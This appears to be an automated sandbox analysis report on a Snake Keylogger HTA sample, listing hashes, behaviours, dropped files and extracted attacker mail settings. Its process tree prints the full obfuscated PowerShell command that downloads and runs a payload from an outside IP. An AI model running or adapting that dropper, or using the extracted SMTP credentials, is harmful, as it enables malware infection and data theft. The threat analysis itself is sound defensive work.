Analysis
-
max time kernel
113s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
07-10-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916.hta
Resource
win10v2004-20240802-en
General
-
Target
f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916.hta
-
Size
116KB
-
MD5
bac652fa9a932e3f71411fb993010377
-
SHA1
0dbe1f2b08510b57f0e00189d2355f57e300c47f
-
SHA256
f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916
-
SHA512
0ab2913b55e1f60cdb26f003d2c17b492385a43bca2d2c5acb1a659c9a5ed3d232eeceb8b0d4b68ffad11599dab9c27d16d1c990f23e54ea3a8ccd73a4de536f
-
SSDEEP
96:Ea+M73mAWZeuhtAWZDuhogROBHRj/oyYJQAWZSAWZXuhdAWZkAT:Ea+Q3mVkuhtVVuhhRwHxY+VgVFuhdVZT
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/2740-84-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 17 1336 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 1336 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 1772 taskhostw.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00080000000234b5-69.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1772 set thread context of 2740 1772 taskhostw.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1336 powershell.exe 1336 powershell.exe 2740 RegSvcs.exe 2740 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1772 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1336 powershell.exe Token: SeDebugPrivilege 2740 RegSvcs.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2392 wrote to memory of 3980 2392 mshta.exe 82 PID 2392 wrote to memory of 3980 2392 mshta.exe 82 PID 2392 wrote to memory of 3980 2392 mshta.exe 82 PID 3980 wrote to memory of 1336 3980 cmd.exe 84 PID 3980 wrote to memory of 1336 3980 cmd.exe 84 PID 3980 wrote to memory of 1336 3980 cmd.exe 84 PID 1336 wrote to memory of 3192 1336 powershell.exe 85 PID 1336 wrote to memory of 3192 1336 powershell.exe 85 PID 1336 wrote to memory of 3192 1336 powershell.exe 85 PID 3192 wrote to memory of 644 3192 csc.exe 86 PID 3192 wrote to memory of 644 3192 csc.exe 86 PID 3192 wrote to memory of 644 3192 csc.exe 86 PID 1336 wrote to memory of 1772 1336 powershell.exe 89 PID 1336 wrote to memory of 1772 1336 powershell.exe 89 PID 1336 wrote to memory of 1772 1336 powershell.exe 89 PID 1772 wrote to memory of 2740 1772 taskhostw.exe 92 PID 1772 wrote to memory of 2740 1772 taskhostw.exe 92 PID 1772 wrote to memory of 2740 1772 taskhostw.exe 92 PID 1772 wrote to memory of 2740 1772 taskhostw.exe 92 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kubc0k4z\kubc0k4z.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE08C.tmp" "c:\Users\Admin\AppData\Local\Temp\kubc0k4z\CSC7D2453DC9951441283B934CDB64F7E5.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:644
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2740
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD565db176d081d732ff5add2e599be88ab
SHA17abeb24969a428d6a25a8c53a0ded036ef8ea2b7
SHA2569f3db0ffa99ca78fbb4781c626b9884417806553919552e81f43bd057bae59c8
SHA5126f14f67a44eebee115a2a29b204367d3ac31a3ead7387a2281b6949ab06a21d3fcd140d7965e579e83cfc73972e8e495f3712020883f4c1554cd23392be8587f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD51790e862fd2ecbb723f3138164fbe937
SHA161867409685aa9ecf63a0915e35650cf0ff34038
SHA256ce44703ca341c01a0d2735b414e7a8f6a8f0a818e39ed947bb13e529a815fb03
SHA512b9e8797508b8b26d4e26c44825d3c0c8898c997828142e9ba3f338fa7a1b22a57392072caa4f031fc34983ecc9a8191c12c8173eceee3d2aed291b7224da5d40
-
Filesize
934KB
MD5d515411b9a3c0d9fb13b9c6a928a7fd0
SHA1f940a7302ac76567c15efb1a15d789b42224aac3
SHA2567b2fcffe77e320517c511f5a3700d8545712475aeb4dc04088537fa8456fec77
SHA512447a5ab235672a2d067e5792260aa5b978720f8d67ac80bd875e74d7032cb496e3b0463f3c3870bd87d975cddf7f750df35a9ea7aa8aa65f1bd1590d3305c9d6
-
Filesize
652B
MD507c765c26523d52617c595e367ead82f
SHA19addf0c1935eb27a7d85b08d5b3477431df5651d
SHA256de5fa6a48164e7f5e84fe0ce2105d98290986a27abca2c8742313ea583a02bba
SHA512d95258f6ac45765c6348025633fcbe5f0010fb5a6bd8282772dc58df41297ec06011977a66ad36f4cdbf37a23d4aefd52a1dec2ce66009efe3b7085fee0cf0e5
-
Filesize
489B
MD566cd8bc31e61e003cddb2ea81c47016a
SHA1b9172635caecd693d1476d08c9cecb5777ea49bb
SHA2560ce2cb15b914d1becfba7f1eed7a96e44610e5b70a8d4a9568ed117d6c3a73dd
SHA5126dd379fff538ecec3814b2bf5ffb2d3e8d1f5e8da9f79b416cd2ac81b916633122565cb9ce89f3bcbb1acb1da0269ae2977fdd515f74f9ffc8dbcae15a0a15e4
-
Filesize
369B
MD52a87feeb9f1390a0d10ca14c6c9e06a1
SHA1d420c3091e98834a3bc57be6e313e5695415ec3a
SHA2565eba3a7275d9f4be40dcff66a8e1410807fdb0b842146e07e5df5a0e5f5a0ed2
SHA5124e297ef0576ff56f2139a58306fc6282e76c7b841b6b9dd311f92683bd430194ccf89cda9359f5210ae0cdc90aec6868f0573ce40354e0a14d922461f9f24274